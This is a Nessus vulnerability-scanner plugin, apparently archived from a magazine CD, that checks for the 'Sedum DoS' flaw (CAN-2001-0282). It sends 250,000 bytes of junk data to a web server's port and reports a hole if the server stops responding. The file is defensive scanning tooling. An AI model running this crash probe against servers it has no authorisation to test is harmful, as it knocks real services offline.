home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / sedum_dos.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines
  1.  
  2. #
  3. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10637);
  11.  script_bugtraq_id(2413);
  12.  script_version ("$Revision: 1.12 $");
  13.  script_cve_id("CAN-2001-0282");
  14.  
  15.  name["english"] = "Sedum DoS";
  16.  name["francais"] = "Sedum DoS";
  17.  script_name(english:name["english"], francais:name["francais"]);
  18.  
  19.  desc["english"] = "It was possible
  20. to make the remote web server crash
  21. by sending it too much data.
  22.  
  23. An attacker may use this flaw to
  24. prevent this host from fulfilling
  25. its role
  26.  
  27. Solution : contact your vendor for a patch
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "Il s'est avΘrΘ
  32. possible de faire planter le
  33. serveur web distant en envoyant trop
  34. de donnΘes sur ce port.
  35.  
  36. Un pirate peut utiliser cette
  37. attaque pour empecher cette machine
  38. de remplir son role de serveur web.
  39.  
  40. Solution : contactez le vendeur pour un patch.
  41. Facteur de risque : SΘrieux";
  42.  
  43.  script_description(english:desc["english"], francais:desc["francais"]);
  44.  
  45.  summary["english"] = "Crashes the remote web server";
  46.  summary["francais"] = "Plante le serveur web distant";
  47.  script_summary(english:summary["english"], francais:summary["francais"]);
  48.  
  49.  script_category(ACT_DENIAL);
  50.  
  51.  
  52.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
  53.         francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
  54.  family["english"] = "Denial of Service";
  55.  family["francais"] = "DΘni de service";
  56.  script_family(english:family["english"], francais:family["francais"]);
  57.  script_dependencies("http_version.nasl");
  58.  script_require_ports("Services/www", 80);
  59.  
  60.  
  61.  exit(0);
  62. }
  63.  
  64. include("http_func.inc");
  65.  
  66. port = get_http_port(default:80);
  67.  
  68. if(get_port_state(port))
  69. {
  70.  soc = open_sock_tcp(port);
  71.  if(soc)
  72.  { 
  73.   req = crap(250000);
  74.   send(socket:soc, data:req);
  75.   close(soc);
  76.   sleep(2);
  77.  
  78.   soc2 = open_sock_tcp(port);
  79.   if(!soc2)security_hole(port);
  80.  }
  81. }
  82.